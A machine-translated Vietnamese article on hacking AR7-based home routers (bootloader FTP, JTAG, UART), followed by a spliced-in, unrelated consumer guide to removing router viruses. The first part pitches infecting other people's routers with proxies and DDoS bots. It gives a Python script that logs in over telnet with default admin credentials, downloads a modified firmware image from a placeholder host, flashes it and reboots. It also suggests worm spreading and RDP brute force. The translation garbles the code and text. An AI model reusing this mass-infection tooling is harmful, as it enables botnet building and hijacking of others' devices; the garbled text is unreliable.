tự động tải (để không nhảy với thiết lập lại) và tăng nhẹ thời gian
chờ kết nối trước khi tải kernel. Tất cả các thông số này được lưu trữ trong
các biến môi trường, có các lệnh FTP ADAM2 đặc biệt: GETENV và SETENV (dành cho
nhận và thiết lập biến tương ứng). Trong phiên FTP, nhập thông tin sau
lệnh:

ftp> Tự động tải SETENV,1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
ftp> trích dẫn KHỞI ĐỘNG LẠI
ftp>thoát

Bộ định tuyến khởi động lại và bạn có thể truy cập ADAM2 theo địa chỉ 192.168.1.1:21. Nếu như
sẽ có mong muốn khởi động lại hình ảnh kernel và kernel sẽ từ chối khởi động, FTP
sẽ tự bắt đầu. Trước khi nhấp nháy các hình ảnh đã sửa đổi, hãy đảm bảo
lưu những cái hiện tại để phục hồi. Nói chung, bạn có thể thay đổi các biến môi trường
và thông qua /proc/ticfg/env, tôi chỉ muốn cho bạn biết thêm về cách làm việc với FTP.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

Bạn có thể kiểm tra những thay đổi như thế này:

# cat /proc/ticfg/env | grep my_ipaddress

Phải làm gì nếu bạn muốn thử khởi động lại bộ nạp khởi động và làm thế nào
phải làm gì trong trường hợp thất bại? Hoặc bộ định tuyến vì lý do nào đó không khởi động được và
không có quyền truy cập vào ADAM2? Có một giải pháp - JTAG, hay nói đúng hơn là con chip này chứa EJTAG
(phiên bản mở rộng). Đây là giao diện để gỡ lỗi/lập trình trong mạch.

Để kết nối với giao diện này chúng ta cần có cổng LPT của máy tính,
đầu nối và 4 điện trở. Đề án này rất đơn giản.

Tôi vội lưu ý rằng việc cài đặt phần mềm thông qua JTAG không phải là một công việc nhanh chóng, nó sẽ mất khá nhiều thời gian.
nhiều thời gian. Vì vậy nó chỉ nên dùng để khôi phục bootloader,
ngay cả khi nó không hoạt động. Để giao tiếp qua JTAG, bạn nên sử dụng một công cụ đặc biệt
chương trình, ví dụ UrJTAG. Dưới đây là một ví dụ về cách hoạt động của giao diện này.
Kết nối cập nhật:

jtag> cáp song song 0x378 DLC5
jtag> phát hiện

Phát hiện bộ nhớ flash:

jtag> detectflash 0x30000000 1

Đọc bộ nhớ Flash:

jtag> readmem 0x30000000 0x400000 fullflash.img

Ghi vào bộ nhớ (bộ nạp khởi động):

jtag> flashmem 0x30000000 adam2.img

Việc biết về giao diện UART cũng rất hữu ích (trước đây tôi đã hứa sẽ nói về nó). TRONG
UART_A báo cáo, nghĩa là ghi nhật ký bộ nạp khởi động (ở giai đoạn đầu khởi động từ
bạn có thể giao tiếp với anh ấy) và cốt lõi. Khi viết hạt nhân đã sửa đổi, điều này
không thể thiếu cho việc gỡ lỗi. UART - Bộ thu/phát không đồng bộ đa năng
(bộ thu phát không đồng bộ phổ quát) hầu như luôn có mặt trên
vi điều khiển.

Mạch chuyển đổi rất đơn giản. Chỉ dựa trên một con chip -
Bộ chuyển đổi mức TTL: MAX232 cho COM và FT232R cho USB. Vi mạch
Chúng khá phổ biến và sẽ không có vấn đề gì khi mua hàng.

Mạch được lắp ráp trên một bảng mạch (có thể dễ dàng đặt trong hộp
nối cổng COM) trong 20 phút và mang lại rất nhiều lợi ích. Ví dụ: khi gỡ lỗi
hạt nhân là một giải pháp hoàn toàn không thể thay thế. Nếu thiết bị điện tử có vấn đề thì sao? Lối ra
là dây USB của điện thoại cũ, chỉ có đầu chuyển thôi
UART-USB.

Một số ý tưởng phân phối

Có proxy/sox của riêng bạn trên bộ định tuyến của người khác là điều tuyệt vời. Giống như spam
bộ định tuyến cho tất cả các giao thức. Đây không phải là máy tính Windows,
được sắp xếp lại hàng tháng :). Bộ định tuyến thường không được thay đổi hoặc khởi động lại. đúng và
Còn ai khác ngoài chúng tôi lại nghĩ ra ý tưởng lây nhiễm vào bộ định tuyến?

Đừng quên, chúng tôi có quyền kiểm soát tất cả lưu lượng truy cập từ người dùng/mạng. Để biết thêm
Trong các bộ định tuyến mạnh mẽ, bạn có thể treo bot DDOS. Ẩn tập tin/ẩn quá trình,
chặn việc ghi vào khối mtd mà không ghi đè chương trình của chúng tôi - tất cả chỉ có vậy
bất cứ điều gì!

Giả sử bạn sắp bắt đầu viết một chương trình nghiêm túc cho bộ định tuyến.
Việc gỡ lỗi rất tốt rất quan trọng, có thể bạn sẽ phải thực hiện việc đó rất nhiều lần
viết lại/khôi phục lại hình ảnh... Đây là một viễn cảnh rất đáng buồn. Bàn tay chẵn
giảm một chút, nếu bạn cũng tính đến tài nguyên ghi lại của bộ nhớ Flash
nhỏ (xem thêm chi tiết trong tài liệu về chip bộ nhớ) và có khả năng
hủy hoại cô ấy. Nhưng có một lối thoát! Qemu có thể mô phỏng AR7! Bạn có thể tưởng tượng được điều gì
nó có mang lại cơ hội và sự thuận tiện không giới hạn không? Bây giờ không có gì ngăn cản chúng tôi
viết một cái gì đó cực kỳ mát mẻ!

Vì thế. Bạn đã viết một chương trình, thử nghiệm nó trên bộ định tuyến của chính bạn hoặc của 1-2 người khác, nhưng
toàn bộ mạng vẫn đang ở phía trước, việc lây nhiễm thủ công là một việc vặt, trên bộ định tuyến thứ 10 bạn đã bắt đầu rồi
nguyền rủa cả thế giới, và những chuỗi “cat” và “mtd” hiện lên trong mắt bạn. Cùng viết nào
một chương trình để tự động hóa những hành động thường ngày này. Tôi đã chọn ngôn ngữ python.

Kế hoạch làm việc như sau:

  • tạo danh sách các bộ định tuyến, ví dụ: sử dụng nmap;
  • tập lệnh sẽ lấy địa chỉ IP từ danh sách theo thứ tự, nhập qua
    telnet với thông tin đăng nhập/mật khẩu tiêu chuẩn;
  • sau đó thực hiện các bước tương tự: tải lên hình ảnh đã sửa đổi,
    viết lại, khởi động lại.

#!/usr/bin/env trăn
#Encode=UTF-8

nhập telnetlib, thời gian

MÁY CHỦ="http://anyhost.com/fs.image"

cho addr trong open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("đăng nhập:")
thời gian.ngủ(5)
telnet.write("admin\n")
telnet.read_until("Mật khẩu:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + MÁY CHỦ)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("khởi động lại")
telnet.close()

Logic của kịch bản còn rất xa mới lý tưởng, bây giờ tôi sẽ giải thích lý do. Vì
Trước tiên, bạn nên kiểm tra phiên bản firmware/kernel và model bộ định tuyến, vì có thể có
sự khác biệt nghiêm trọng trong công việc. Tiếp theo, thay vì để trống phần sụn, bạn nên tải xuống
hình ảnh hệ thống tập tin từ bộ định tuyến, giải nén, sửa đổi và gửi
mặt sau. Điều này sẽ loại bỏ các vấn đề phát sinh với khả năng tương thích trong các
model/phiên bản firmware, vì tính ổn định khi vận hành là điều quan trọng nhất đối với bạn.
Ngoài ra, vi-rút có thể có chức năng của sâu và nếu muốn, bạn luôn có thể
đính kèm một máy quét mạng, sức mạnh vũ phu cho RDP và các tính năng tương tự với nó.

Có một cách tuyệt vời khác để truyền bá nó. Không có gì ngăn cản bạn viết
chương trình dành cho Windows mà bạn sẽ mang theo bên mình (hoặc tải xuống từ
server) và lây nhiễm nó vào bộ định tuyến, nếu có.
Phân phối chương trình này theo mọi cách "tiêu chuẩn": ổ đĩa di động,
khai thác chương trình, lây nhiễm chương trình khác... Bằng cách kết hợp các phương pháp này,
Bạn có thể tạo ra một đại dịch nghiêm trọng. Chỉ cần tưởng tượng bức ảnh này - sau tất cả
Những thiết bị như vậy có mặt khắp nơi.

Bảo vệ bộ định tuyến

Sau khi tìm hiểu tất cả những điều này, tôi nghĩ: làm cách nào tôi có thể bảo vệ bộ định tuyến? Và sau đó, bạn thấy đấy, và
Tôi sẽ tự mình tới đó. Bước đầu tiên là thay đổi mật khẩu người dùng thành mật khẩu phức tạp hơn và
dài (giới hạn 8 ký tự), thay đổi banner và lời chào dịch vụ
(trình soạn thảo hex, hoặc tốt nhất là biên dịch lại các chương trình) theo thứ tự
nmap hoặc các máy quét khác không thể xác định phiên bản dịch vụ.

Bạn cũng nên thay đổi các cổng mà lũ quỷ treo trên đó. Việc này được thực hiện bởi
sửa đổi progdefs.xml. Kill telnet (cách dễ nhất để đoán mật khẩu, vâng
và giao thức không được bảo vệ, tại sao chúng ta cần nó), bật tường lửa, cho phép kết nối
chỉ truy cập dịch vụ từ địa chỉ IP hoặc MAC của riêng bạn. Cũng sử dụng tường lửa
để bảo vệ mạng hoặc máy tính, nó không phải là vô ích. Thiết lập thông minh
các quy tắc sẽ luôn giúp bạn tự bảo vệ mình.

Phần kết luận

Nhiều, không chỉ bộ định tuyến D-Link và các thiết bị tương tự khác được xây dựng trên
Chip AR7, danh sách gồm có Acorp, NetGear, Linksys, Actionec... Khá
AR7 này phổ biến cùng với MontaVista. Sau đó, bằng cách sử dụng tương tự
toolchain, bạn có thể thực hiện các bước được mô tả trong bài viết mà không gặp vấn đề gì.

Hãy thử nghĩ xem: ngoài những hành động có hại, bạn còn có thể làm điều gì đó có ích/dễ chịu cho bản thân.
và những thứ khác (tôi không tranh luận, niềm vui của việc hack không thể thay thế được, nhưng vẫn vậy).
Bạn có thể tạo chương trình cơ sở của riêng mình, chẳng hạn như các bộ định tuyến mạnh hơn có thể
tải xuống/phân phối torrent... Tất cả các model đều có giao diện USB 1.1, nhưng ở những model trẻ hơn
mô hình nó không được hàn. Thêm mô-đun USB và trình điều khiển hệ thống tệp vào kernel,
trang bị cho bộ định tuyến bộ nhớ Flash - và cuối cùng bạn sẽ có được một loại bộ lưu trữ mạng cho
số tiền nhỏ. Có rất nhiều lựa chọn, nhưng hàng nghìn ý tưởng sẽ nảy sinh - không phải
giới hạn bản thân, sáng tạo và sáng tạo!

Sự cố khi phân phối Wi-Fi bằng bộ định tuyến phát sinh vì nhiều lý do. Một trong số đó là việc thiết bị phân phối bị nhiễm vi-rút mà bạn có thể tự loại bỏ.

  • một loại virus làm chậm tốc độ Internet theo nhiều cách khác nhau. Ví dụ: phần mềm độc hại như vậy làm rối loạn cài đặt chương trình cơ sở hoặc bắt đầu tải một số nội dung vi-rút quảng cáo xuống máy tính;
  • một loại virus thay thế địa chỉ trang web. Nó trông như thế này: người dùng truy cập bất kỳ trang web an toàn nào đã biết và vi-rút thay đổi DNS theo cách mà người dùng kết thúc trên một trang web quảng cáo hoặc nhìn thấy các biểu ngữ quảng cáo mà chủ sở hữu trang web không đặt chúng. Loại vi-rút như vậy cũng nguy hiểm vì nó có thể chuyển hướng bạn đến một trang web chứa vi-rút khác.

Trong mọi trường hợp, nếu bạn nhận thấy rằng bộ định tuyến của mình không hoạt động bình thường, bạn nên kiểm tra vi-rút, đặc biệt vì việc loại bỏ chúng rất dễ dàng.

Virus xâm nhập vào bộ định tuyến bằng cách nào?

Bộ định tuyến cung cấp Internet cho tất cả các thiết bị được kết nối với nó. Điều này có nghĩa là tất cả các thiết bị và bộ định tuyến đều nằm trên cùng một mạng gia đình. Đây là điều mà vi-rút lợi dụng: nó xâm nhập vào máy tính từ một số trang web hoặc tệp đã tải xuống, sau đó truyền qua mạng đến bộ định tuyến, nơi nó bắt đầu thực hiện các thủ đoạn bẩn thỉu. Quá trình này phụ thuộc vào kiểu vi-rút, ví dụ: một số phần mềm độc hại không tự phát hiện cụ thể trên máy tính mà chỉ bắt đầu hoạt động khi nó xâm nhập vào bộ định tuyến, trong khi những phần mềm độc hại khác tìm cách gây hại cho cả hệ điều hành và chương trình cơ sở của bộ định tuyến tại cùng lúc.

Kiểm tra bộ định tuyến

Trước khi làm sạch bộ định tuyến của bạn khỏi vi-rút, bạn cần kiểm tra xem có vi-rút nào trên đó không. Để tìm ra kết quả, bạn cần sử dụng Internet trực tiếp thông qua máy tính của mình. Tức là tháo cáp WLAN hoặc modem khỏi bộ định tuyến và cắm nó vào cổng máy tính, sau đó làm theo các bước sau:

Nếu bạn gặp vấn đề về tốc độ, hãy làm theo ba bước sau.

  1. Kiểm tra tốc độ internet của bạn. Điều này cần phải được thực hiện để trong tương lai biết liệu tốc độ có giống nhau khi sử dụng mạng trực tiếp và thông qua bộ định tuyến hay không. Ví dụ: bạn có thể tải xuống một tệp hoặc sử dụng dịch vụ trực tuyến đặc biệt Speedtest.

    Chúng tôi quét tốc độ Internet thông qua trang web Speedtest

  2. Để xác định chính xác hơn chất lượng tín hiệu, bạn cần tìm hiểu chỉ báo ping. Ping là thời gian cần thiết để tín hiệu được gửi từ thiết bị của bạn, đến máy chủ và quay trở lại. Đương nhiên, nó càng lớn thì càng tệ cho bạn. Mở một dòng lệnh, nhập lệnh ping ip và chạy nó. IP - địa chỉ kết nối của bạn, mặc định thường là 192.168.0.1 nhưng có thể thay đổi. Hãy nhớ kết quả. Giá trị ping bình thường lên tới 40 ms là một chỉ báo tuyệt vời, 40–110 ms là giá trị trung bình bình thường, hơn 110 ms đáng để suy nghĩ về việc cấu hình lại mạng, cải thiện tín hiệu hoặc thay đổi nhà cung cấp.

    Thực hiện lệnh ping ip

  3. Sau danh sách các gói đã gửi, bạn sẽ thấy số liệu thống kê. Bạn quan tâm đến dòng “Gói”, nó tính toán có bao nhiêu gói đã được gửi, bị mất, đã hoàn thành. Nếu số gói bị mất vượt quá 5%, bạn cần tìm hiểu nguyên nhân là gì. Nếu một số lượng lớn gói tin không đến được máy chủ hoặc quay trở lại, điều này sẽ ảnh hưởng lớn đến tốc độ của Internet.

    Hãy xem bao nhiêu phần trăm gói tin bị mất

Sau khi bạn hoàn thành tất cả các bước trên, hãy lấy thông tin chi tiết về ping, số lượng gói bị mất và tốc độ Internet, kết nối lại cáp WLAN hoặc modem với bộ định tuyến và kiểm tra tất cả các chỉ báo tương tự khi kết nối qua Wi-Fi. Nếu các thông số xấp xỉ nhau thì vấn đề không nằm ở bộ định tuyến, có lẽ nguyên nhân là ở phía nhà điều hành. Mặt khác, nếu sự cố với Internet chỉ xảy ra khi sử dụng thông qua bộ định tuyến, bạn cần đặt lại cài đặt và xóa vi-rút.

Loại bỏ virus

Để loại bỏ virus, bạn cần đặt lại cài đặt về giá trị mặc định. Nếu vi-rút làm hỏng phần sụn, bạn sẽ phải tự cài đặt lại phần sụn.

Đặt lại cài đặt

  1. Tìm nút Đặt lại ở mặt sau của bộ định tuyến. Nó thường nhỏ hơn tất cả những cái khác. Nó cần được nhấn trong 10–15 giây. Khi bộ định tuyến tắt và bắt đầu khởi động lại, bạn có thể giải phóng nó. Việc khởi động lại bộ định tuyến sẽ thông báo cho bạn rằng các cài đặt đã được đặt lại. Xin lưu ý rằng mật khẩu bạn đặt cũng sẽ bị mất.

    Nhấn nút Đặt lại

  2. Để cấu hình lại bộ định tuyến, bạn cần kết nối nó với máy tính qua cáp, sau đó mở trình duyệt và truy cập http://192.168.0.1. Có lẽ địa chỉ sẽ khác; bạn có thể tìm thấy nó trên nhãn dán trên chính bộ định tuyến hoặc trong tài liệu đi kèm với bộ định tuyến. Bạn sẽ được yêu cầu đăng nhập và mật khẩu, thông tin đăng nhập mặc định là quản trị viên và mật khẩu là quản trị viên hoặc 12345. Thông tin chi tiết hơn được mô tả trong hướng dẫn dành cho bộ định tuyến.
  3. Đi tới Cài đặt nhanh. Chỉ định các tùy chọn phù hợp với bạn. Nếu muốn, hãy đặt mật khẩu và thay đổi tên mạng. Sau khi hoàn tất quy trình thiết lập, hãy lưu các thay đổi và khởi động lại bộ định tuyến.

    Vào phần “Cài đặt nhanh” và thiết lập các cài đặt tiện lợi

Sau khi hoàn thành tất cả các bước trên, hãy kiểm tra xem bạn đã thoát khỏi lỗi chưa. Nếu không, bạn sẽ phải khởi động lại bộ định tuyến theo cách thủ công.

Khởi động lại bộ định tuyến

Phần mềm bộ định tuyến chỉ khả dụng nếu thiết bị được kết nối với máy tính qua cáp. Bạn không thể cập nhật chương trình cơ sở qua Wi-Fi.

  1. Có một nhãn dán ở mặt sau của bộ định tuyến. Tìm mô hình bộ định tuyến của bạn trên đó. Nó cũng chứa thông tin về phiên bản phần sụn được cài đặt ban đầu. Nếu phiên bản của nó là 7 thì tốt hơn hết bạn nên cài đặt bản cập nhật cho phiên bản 7 để tránh xung đột giữa phần sụn quá mới và phần cứng cũ của bộ định tuyến.

    Tìm hiểu phiên bản phần sụn và kiểu bộ định tuyến

  2. Truy cập trang web của nhà sản xuất và sử dụng thanh tìm kiếm để tìm phiên bản mong muốn cho kiểu máy của bạn. Tải nó về máy tính của bạn.

    Tìm và tải xuống phiên bản phần sụn cần thiết

  3. Tệp đã tải xuống sẽ được lưu trữ. Trích xuất nội dung của nó vào bất kỳ thư mục thuận tiện nào.

    Cách bảo vệ bộ định tuyến của bạn khỏi vi-rút trong tương lai

    Cách duy nhất để bảo vệ bộ định tuyến của bạn khỏi vi-rút là ngăn chúng xâm nhập vào máy tính của bạn. Máy tính của bạn được bảo vệ bằng phần mềm chống vi-rút. Cài đặt và trong mọi trường hợp không vô hiệu hóa bất kỳ phần mềm chống vi-rút hiện đại nào. Hầu như không thể phát hiện được phần mềm độc hại bằng phần mềm chống vi-rút được kích hoạt. Thậm chí không cần thiết phải sử dụng các chương trình bảo mật trả phí, ngày nay, các chương trình tương tự miễn phí chất lượng cao là đủ.

    Phải làm gì nếu không có gì giúp được

    Nếu làm theo tất cả các hướng dẫn trên không mang lại kết quả như mong muốn, thì còn lại hai lựa chọn: sự cố phát sinh do sự cố phần vật lý của bộ định tuyến hoặc lỗi từ phía nhà cung cấp. Trước tiên, bạn nên gọi cho công ty cung cấp Internet và cho họ biết về vấn đề của bạn cũng như các phương pháp không giúp giải quyết được vấn đề đó. Thứ hai, bộ định tuyến nên được đưa đến một dịch vụ đặc biệt để các chuyên gia có thể kiểm tra nó.

    Việc lây nhiễm virus vào bộ định tuyến là một trường hợp hiếm gặp nhưng nguy hiểm. Có hai cách để loại bỏ vi-rút: bằng cách đặt lại cài đặt và cập nhật chương trình cơ sở. Bạn cũng cần đảm bảo rằng không còn phần mềm độc hại nào trên máy tính của bạn.